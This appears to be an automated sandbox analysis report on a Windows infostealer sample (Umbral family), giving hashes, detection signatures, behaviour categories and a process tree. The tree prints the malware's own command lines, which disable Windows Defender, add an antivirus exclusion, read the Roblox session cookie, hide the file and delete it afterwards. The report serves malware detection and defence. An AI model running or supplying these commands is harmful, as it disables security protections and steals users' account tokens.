Analysis
-
max time kernel
130s -
max time network
141s -
platform
windows10-ltsc 2021_x64 -
resource
win10ltsc2021-20241211-en -
resource tags
arch:x64arch:x86image:win10ltsc2021-20241211-enlocale:en-usos:windows10-ltsc 2021-x64system -
submitted
12-01-2025 03:25
Static task
static1
Behavioral task
behavioral1
Sample
resembleC2.exe
Resource
win10ltsc2021-20241211-en
General
-
Target
resembleC2.exe
-
Size
763KB
-
MD5
f70fb0eacdba5672bd67ff9ad29e425b
-
SHA1
35c7ad26473afb12c8b46dfb51f3e0d73b92a7eb
-
SHA256
325ec7369a18af43c95815bacf830f5bcd1093436c25f67685226fe0d4812280
-
SHA512
e93012796de946c4b009d9c68a539ea010d88952c11ddd0fc05d3d4ebe1657f16a7f75269e2c6075c12564f40752c7f4aec0c64583ffb46d06ec69431e5f6ff5
-
SSDEEP
12288:wjB1GbyBRc8nAVCCpViLkSdIi/NvFFuHtHylX5mmYKlzQUG1R9qRst2hmKyL/mVD:wjB1myBRccwf/SdNFvFFu1yh5zlzY1RS
Malware Config
Signatures
-
Detect Umbral payload 2 IoCs
resource yara_rule behavioral1/files/0x00280000000460fe-26.dat family_umbral behavioral1/memory/3288-38-0x000001B0FD040000-0x000001B0FD080000-memory.dmp family_umbral -
Umbral family
-
Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 3888 powershell.exe 2004 powershell.exe 1852 powershell.exe 1396 powershell.exe -
Drops file in Drivers directory 1 IoCs
description ioc Process File opened for modification C:\Windows\System32\drivers\etc\hosts MoonHub.exe -
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3829776853-2076861744-2973657197-1000\Control Panel\International\Geo\Nation resembleC2.exe Key value queried \REGISTRY\USER\S-1-5-21-3829776853-2076861744-2973657197-1000\Control Panel\International\Geo\Nation resemble.exe -
Executes dropped EXE 3 IoCs
pid Process 664 resemble.exe 3288 MoonHub.exe 2776 AudioDriver.exe -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Drops desktop.ini file(s) 2 IoCs
description ioc Process File created C:\Windows\assembly\Desktop.ini resemble.exe File opened for modification C:\Windows\assembly\Desktop.ini resemble.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 23 discord.com 24 discord.com -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 15 ip-api.com -
Drops file in Windows directory 3 IoCs
description ioc Process File opened for modification C:\Windows\assembly resemble.exe File created C:\Windows\assembly\Desktop.ini resemble.exe File opened for modification C:\Windows\assembly\Desktop.ini resemble.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 2 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language resemble.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language AudioDriver.exe -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs
Adversaries may check for Internet connectivity on compromised systems.
pid Process 2964 PING.EXE 4192 cmd.exe -
Detects videocard installed 1 TTPs 1 IoCs
Uses WMIC.exe to determine videocard installed.
pid Process 4056 wmic.exe -
Modifies registry class 2 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3829776853-2076861744-2973657197-1000_Classes\Local Settings resembleC2.exe Key created \REGISTRY\USER\S-1-5-21-3829776853-2076861744-2973657197-1000_Classes\Local Settings OpenWith.exe -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 2964 PING.EXE -
Suspicious behavior: EnumeratesProcesses 46 IoCs
pid Process 1776 wmic.exe 1776 wmic.exe 1776 wmic.exe 1776 wmic.exe 2776 AudioDriver.exe 2776 AudioDriver.exe 2776 AudioDriver.exe 3288 MoonHub.exe 3888 powershell.exe 3888 powershell.exe 2004 powershell.exe 2004 powershell.exe 1852 powershell.exe 1852 powershell.exe 1688 powershell.exe 1688 powershell.exe 2532 wmic.exe 2532 wmic.exe 2532 wmic.exe 2532 wmic.exe 4612 wmic.exe 4612 wmic.exe 4612 wmic.exe 4612 wmic.exe 3924 wmic.exe 3924 wmic.exe 3924 wmic.exe 3924 wmic.exe 1396 powershell.exe 1396 powershell.exe 4056 wmic.exe 4056 wmic.exe 4056 wmic.exe 4056 wmic.exe 2776 AudioDriver.exe 2776 AudioDriver.exe 2776 AudioDriver.exe 2776 AudioDriver.exe 2776 AudioDriver.exe 2776 AudioDriver.exe 2776 AudioDriver.exe 2776 AudioDriver.exe 2776 AudioDriver.exe 2776 AudioDriver.exe 2776 AudioDriver.exe 2776 AudioDriver.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 3288 MoonHub.exe Token: SeIncreaseQuotaPrivilege 1776 wmic.exe Token: SeSecurityPrivilege 1776 wmic.exe Token: SeTakeOwnershipPrivilege 1776 wmic.exe Token: SeLoadDriverPrivilege 1776 wmic.exe Token: SeSystemProfilePrivilege 1776 wmic.exe Token: SeSystemtimePrivilege 1776 wmic.exe Token: SeProfSingleProcessPrivilege 1776 wmic.exe Token: SeIncBasePriorityPrivilege 1776 wmic.exe Token: SeCreatePagefilePrivilege 1776 wmic.exe Token: SeBackupPrivilege 1776 wmic.exe Token: SeRestorePrivilege 1776 wmic.exe Token: SeShutdownPrivilege 1776 wmic.exe Token: SeDebugPrivilege 1776 wmic.exe Token: SeSystemEnvironmentPrivilege 1776 wmic.exe Token: SeRemoteShutdownPrivilege 1776 wmic.exe Token: SeUndockPrivilege 1776 wmic.exe Token: SeManageVolumePrivilege 1776 wmic.exe Token: 33 1776 wmic.exe Token: 34 1776 wmic.exe Token: 35 1776 wmic.exe Token: 36 1776 wmic.exe Token: SeIncreaseQuotaPrivilege 1776 wmic.exe Token: SeSecurityPrivilege 1776 wmic.exe Token: SeTakeOwnershipPrivilege 1776 wmic.exe Token: SeLoadDriverPrivilege 1776 wmic.exe Token: SeSystemProfilePrivilege 1776 wmic.exe Token: SeSystemtimePrivilege 1776 wmic.exe Token: SeProfSingleProcessPrivilege 1776 wmic.exe Token: SeIncBasePriorityPrivilege 1776 wmic.exe Token: SeCreatePagefilePrivilege 1776 wmic.exe Token: SeBackupPrivilege 1776 wmic.exe Token: SeRestorePrivilege 1776 wmic.exe Token: SeShutdownPrivilege 1776 wmic.exe Token: SeDebugPrivilege 1776 wmic.exe Token: SeSystemEnvironmentPrivilege 1776 wmic.exe Token: SeRemoteShutdownPrivilege 1776 wmic.exe Token: SeUndockPrivilege 1776 wmic.exe Token: SeManageVolumePrivilege 1776 wmic.exe Token: 33 1776 wmic.exe Token: 34 1776 wmic.exe Token: 35 1776 wmic.exe Token: 36 1776 wmic.exe Token: SeDebugPrivilege 2776 AudioDriver.exe Token: SeDebugPrivilege 3888 powershell.exe Token: SeIncreaseQuotaPrivilege 3888 powershell.exe Token: SeSecurityPrivilege 3888 powershell.exe Token: SeTakeOwnershipPrivilege 3888 powershell.exe Token: SeLoadDriverPrivilege 3888 powershell.exe Token: SeSystemProfilePrivilege 3888 powershell.exe Token: SeSystemtimePrivilege 3888 powershell.exe Token: SeProfSingleProcessPrivilege 3888 powershell.exe Token: SeIncBasePriorityPrivilege 3888 powershell.exe Token: SeCreatePagefilePrivilege 3888 powershell.exe Token: SeBackupPrivilege 3888 powershell.exe Token: SeRestorePrivilege 3888 powershell.exe Token: SeShutdownPrivilege 3888 powershell.exe Token: SeDebugPrivilege 3888 powershell.exe Token: SeSystemEnvironmentPrivilege 3888 powershell.exe Token: SeRemoteShutdownPrivilege 3888 powershell.exe Token: SeUndockPrivilege 3888 powershell.exe Token: SeManageVolumePrivilege 3888 powershell.exe Token: 33 3888 powershell.exe Token: 34 3888 powershell.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
pid Process 2776 AudioDriver.exe -
Suspicious use of SendNotifyMessage 1 IoCs
pid Process 2776 AudioDriver.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 4888 OpenWith.exe -
Suspicious use of WriteProcessMemory 34 IoCs
description pid Process procid_target PID 5016 wrote to memory of 664 5016 resembleC2.exe 82 PID 5016 wrote to memory of 664 5016 resembleC2.exe 82 PID 5016 wrote to memory of 664 5016 resembleC2.exe 82 PID 5016 wrote to memory of 3288 5016 resembleC2.exe 84 PID 5016 wrote to memory of 3288 5016 resembleC2.exe 84 PID 3288 wrote to memory of 1776 3288 MoonHub.exe 87 PID 3288 wrote to memory of 1776 3288 MoonHub.exe 87 PID 664 wrote to memory of 2776 664 resemble.exe 89 PID 664 wrote to memory of 2776 664 resemble.exe 89 PID 664 wrote to memory of 2776 664 resemble.exe 89 PID 3288 wrote to memory of 820 3288 MoonHub.exe 91 PID 3288 wrote to memory of 820 3288 MoonHub.exe 91 PID 3288 wrote to memory of 3888 3288 MoonHub.exe 93 PID 3288 wrote to memory of 3888 3288 MoonHub.exe 93 PID 3288 wrote to memory of 2004 3288 MoonHub.exe 97 PID 3288 wrote to memory of 2004 3288 MoonHub.exe 97 PID 3288 wrote to memory of 1852 3288 MoonHub.exe 99 PID 3288 wrote to memory of 1852 3288 MoonHub.exe 99 PID 3288 wrote to memory of 1688 3288 MoonHub.exe 101 PID 3288 wrote to memory of 1688 3288 MoonHub.exe 101 PID 3288 wrote to memory of 2532 3288 MoonHub.exe 103 PID 3288 wrote to memory of 2532 3288 MoonHub.exe 103 PID 3288 wrote to memory of 4612 3288 MoonHub.exe 106 PID 3288 wrote to memory of 4612 3288 MoonHub.exe 106 PID 3288 wrote to memory of 3924 3288 MoonHub.exe 108 PID 3288 wrote to memory of 3924 3288 MoonHub.exe 108 PID 3288 wrote to memory of 1396 3288 MoonHub.exe 110 PID 3288 wrote to memory of 1396 3288 MoonHub.exe 110 PID 3288 wrote to memory of 4056 3288 MoonHub.exe 112 PID 3288 wrote to memory of 4056 3288 MoonHub.exe 112 PID 3288 wrote to memory of 4192 3288 MoonHub.exe 114 PID 3288 wrote to memory of 4192 3288 MoonHub.exe 114 PID 4192 wrote to memory of 2964 4192 cmd.exe 116 PID 4192 wrote to memory of 2964 4192 cmd.exe 116 -
Views/modifies file attributes 1 TTPs 1 IoCs
pid Process 820 attrib.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\resembleC2.exe"C:\Users\Admin\AppData\Local\Temp\resembleC2.exe"1⤵
- Checks computer location settings
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:5016 -
C:\Users\Admin\AppData\Local\Temp\resemble.exe"C:\Users\Admin\AppData\Local\Temp\resemble.exe"2⤵
- Checks computer location settings
- Executes dropped EXE
- Drops desktop.ini file(s)
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:664 -
C:\Users\Admin\AppData\Roaming\Microsoft\Speech\AudioDriver.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Speech\AudioDriver.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:2776
-
-
-
C:\Users\Admin\AppData\Local\Temp\MoonHub.exe"C:\Users\Admin\AppData\Local\Temp\MoonHub.exe"2⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3288 -
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1776
-
-
C:\Windows\SYSTEM32\attrib.exe"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\MoonHub.exe"3⤵
- Views/modifies file attributes
PID:820
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\MoonHub.exe'3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3888
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 23⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:2004
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:1852
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY3⤵
- Suspicious behavior: EnumeratesProcesses
PID:1688
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" os get Caption3⤵
- Suspicious behavior: EnumeratesProcesses
PID:2532
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" computersystem get totalphysicalmemory3⤵
- Suspicious behavior: EnumeratesProcesses
PID:4612
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid3⤵
- Suspicious behavior: EnumeratesProcesses
PID:3924
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:1396
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic" path win32_VideoController get name3⤵
- Detects videocard installed
- Suspicious behavior: EnumeratesProcesses
PID:4056
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\MoonHub.exe" && pause3⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Suspicious use of WriteProcessMemory
PID:4192 -
C:\Windows\system32\PING.EXEping localhost4⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:2964
-
-
-
-
C:\Windows\system32\OpenWith.exeC:\Windows\system32\OpenWith.exe -Embedding1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:4888
Network
MITRE ATT&CK Enterprise v15
Credential Access
Credentials from Password Stores
1Credentials from Web Browsers
1Unsecured Credentials
1Credentials In Files
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
3KB
MD53eb3833f769dd890afc295b977eab4b4
SHA1e857649b037939602c72ad003e5d3698695f436f
SHA256c485a6e2fd17c342fca60060f47d6a5655a65a412e35e001bb5bf88d96e6e485
SHA512c24bbc8f278478d43756807b8c584d4e3fb2289db468bc92986a489f74a8da386a667a758360a397e77e018e363be8912ac260072fa3e31117ad0599ac749e72
-
Filesize
1KB
MD543a63637614b06cf4ca7e1b85c25b071
SHA11fefef7f0dfef9f9ba248f168a0c85314f5f4053
SHA2560f3ec5a874fe41abd67013b8481610202272468333616bf098ced19c1f271e6b
SHA5126396d789420a8a13367483ec6d7f288e437cf75527f11132285738587ce549f95587c32c56d023008b5725e465a76da244093707079b13216c057a550b4cc1d0
-
Filesize
1KB
MD560b3262c3163ee3d466199160b9ed07d
SHA1994ece4ea4e61de0be2fdd580f87e3415f9e1ff6
SHA256e3b30f16d41f94cba2b8a75f35c91ae7418465abfbfe5477ec0551d1952b2fdb
SHA512081d2015cb94477eb0fbc38f44b6d9b4a3204fb3ad0b7d0e146a88ab4ab9a0d475207f1adae03f4a81ccc5beb7568dc8be1249f69e32fe56efd9ee2f6ee3b1af
-
Filesize
948B
MD58e120be675cae7efeda4d34b327c9681
SHA1f0bf3d389fd8e9f8a4040ac30395fe5b0e11d438
SHA256acd32ca4ecf5904c47cdaa22a05da184e2083447ca8a94e7468bc7e5a8f00151
SHA512957489c4b6b606231aea76475b99826e8d8e045e5973d4770ee2fd2f7ebd9e79472324d7baa8539aa84482e8b774ac1b0e08ae4e983eda48dda7951400ef67da
-
Filesize
1KB
MD58e1fdd1b66d2fee9f6a052524d4ddca5
SHA10a9d0994559d1be2eecd8b0d6960540ca627bdb6
SHA2564cc7c1b79d1b48582d4dc27ca8c31457b9bf2441deb7914399bb9e6863f18b13
SHA5125a5494b878b08e8515811ab7a3d68780dac7423f5562477d98249a8bedf7ec98567b7cd5d4c6967d6bc63f2d6d9b7da9a65e0eb29d4b955026b469b5b598d1f3
-
Filesize
231KB
MD5f70b5e56a09af292d4e909c547f9c8c0
SHA1577883bdbe8dc9582e15e7a1212b1fe432bafce3
SHA2568fd22c5acb3144dbaa5ab3f9dd5901eb6f3beef67e72ea431246c6a790c067de
SHA512e54ccb56aa6473abd3530493933d5164f2dff02076e0f03443382f02d177a52e318d8d0f432e6a3fb5620eaffd09f2dbf6ccbf9698ba149b149c594fa162d879
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
845KB
MD556edb111575113d40af0f1c028dcb315
SHA1018a7abc977ba73e2f66f1e7bf041191089c100c
SHA256c7b542ac39e8e5a14ef0cd70dc3bb505cbdbef4d737c7cb310353642ca914235
SHA5122c87ad1db2ce3745426eb47e76b855124e97747d895d8f5b90adf9018a03c6059dc96537429cf03e2d9af51ca49b751c418820d7a27557e33b8ef54f7305c406
-
Filesize
27KB
MD523f1fabaef532d89fcb6d5bb14a36ef3
SHA1679a82ed172d49f298bf07b6fa0de9b6c2ce0046
SHA256e4410bc67b1ee8af2df456713b85040917b8cf749fb7d660feeb625b25ec9c51
SHA51296e2baa6ce0220b9ad167b60220c683d5b080a9ba9a2e4d320aae6989f4aa2d241f8078e69bdd2da39a20d9b57ae84240da912d29e5e1db36cc90cf6a0537458